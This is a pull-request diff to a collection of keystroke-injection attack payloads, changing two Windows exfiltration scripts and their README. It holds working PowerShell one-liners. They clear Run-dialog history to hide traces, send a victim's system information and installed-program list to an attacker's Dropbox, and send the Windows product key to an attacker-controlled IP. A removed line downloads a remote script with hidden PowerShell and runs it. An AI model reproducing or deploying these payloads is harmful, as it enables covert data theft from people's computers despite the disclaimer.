Merge pull request #243 from Who-Is-Julien/master

Small changes for payloads "Windows-Product-Duckey" & "Windows-Privilege-Excalibur"

payloads/library/exfiltration/Windows-Privilege-Excalibur/.ps1

@@ -3,4 +3,4 @@
 #Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
 
 
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/' + $env:computername + '-report.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "~~~~~ System Information ~~~~~`n $(SYSTEMINFO | Out-String) `n~~~~~ Installed Programs ~~~~~`n $(Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null

payloads/library/exfiltration/Windows-Privilege-Excalibur/source.ps1

@@ -31,7 +31,7 @@ $access_token = $access_token_response.access_token
 $headers = @{
 "Authorization" = "Bearer $access_token"
 "Content-Type" = "application/octet-stream"
-"Dropbox-API-Arg" = '{ "path": "/' + $env:computername + '-report.txt", "mode": "add", "autorename": true, "mute": false }'
+"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
 }
 
 #Define the report for the file upload

payloads/library/exfiltration/Windows-Product-Duckey/.ps1

@@ -1,4 +1,4 @@
-#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
+#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
 
 
-Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null; Exit
+Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null

payloads/library/exfiltration/Windows-Product-Duckey/README.md

@@ -1,6 +1,6 @@
 <h1 align="center">
   <a href="https://git.io/typing-svg">
-    <img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑&center=true&size=25">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Product+Duckey+🦆🔑">
   </a>
 </h1>
 
@@ -8,34 +8,27 @@
 
 This payload exfiltrate the target's Windows product key to a remote server. *Only works on Windows 10,11.*
 
-## Demo
-
-<h2 align="center">
-  <img src="https://raw.githubusercontent.com/Who-Is-Julien/Ducky-Scripts/main/Windows-Product-Duckey/demo.gif">
-</h2>
-
-Here we can see that the attacker's server received the following request:
-```
-GET /?duckey=A1B2C-3D4E5-F6G6F-5E4D3-C2B1A HTTP/1.1
-```
-*Which contains the target's Windows product key!*
-
 ## Usage
 
-To use this script, follow these steps:
+### Setup
 
-1. Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
+- Set up a website on your server or a computer in the same network as the target's computer. You can use Python to do this by running the following command:
 ```
 python -m http.server 80
 ```
-2. Download the payload.txt and .ps1 files and modify them to include the IP address of your server.
-3. Move the modified .ps1 file to the root directory of your website, so it is downloadable from this address:
+- Download the "payload.txt" and ".ps1" files and modify them to include the IP address of your server.
+- Move the modified ".ps1" file to the root directory of your website, so it is downloadable from this address:
 ```
-http://REMOTE_IP_ADDRESS/.ps1
+http://<REMOTE_IP_ADDRESS>/.ps1
 ```
-4. Plug in your device that is configured with the modified payload.txt to the target's computer.
-5. Wait for the target to download and execute the .ps1 file from your website. You can track the target's IP address and Windows product key by checking your website logs.
 
+### Analysis
+
+Once the payload is executed, you can find the target's IP address and Windows product key by checking your website logs.
 
 
 ***Note**: This script is designed to send the results to a specific server, so you don't have to rely on any file sharing services. Additionally, you can easily adapt it to work with encrypted sites.*
+
+---
+
+*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*

payloads/library/exfiltration/Windows-Product-Duckey/old_payload.txt

@@ -1,14 +0,0 @@
-REM     Title: Windows Product Duckey
-REM     Author: Who-Is-Julien
-REM     Description: This payload exfiltrate the target's Windows product key to a remote server.
-REM     Target: Windows 10, 11
-
-REM     Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
-
-
-DELAY 2000
-GUI r
-DELAY 500
-STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr http://REMOTE_IP_ADDRESS/.ps1; invoke-expression $pl
-DELAY 500
-ENTER

payloads/library/exfiltration/Windows-Product-Duckey/source.ps1

@@ -1,10 +1,8 @@
-#Replace REMOTE_IP_ADDRESS with the actual IP address of the remote server hosting the script.
+#Replace <REMOTE_IP_ADDRESS> with the actual IP address of the remote server hosting the script.
 
 
-#clear windows run dialog history
+#Clear windows run dialog history
 Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
 
-#retrieve and send the computer's original product key to a remote server
-Invoke-WebRequest -Uri "http://REMOTE_IP_ADDRESS?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null
-
-Exit
+#Retrieve and send the computer's original product key to a remote server
+Invoke-WebRequest -Uri "http://<REMOTE_IP_ADDRESS>?duckey=$((Get-WmiObject -Class SoftwareLicensingService).OA3xOriginalProductKey)" -Method Get -UseBasicParsing | Out-Null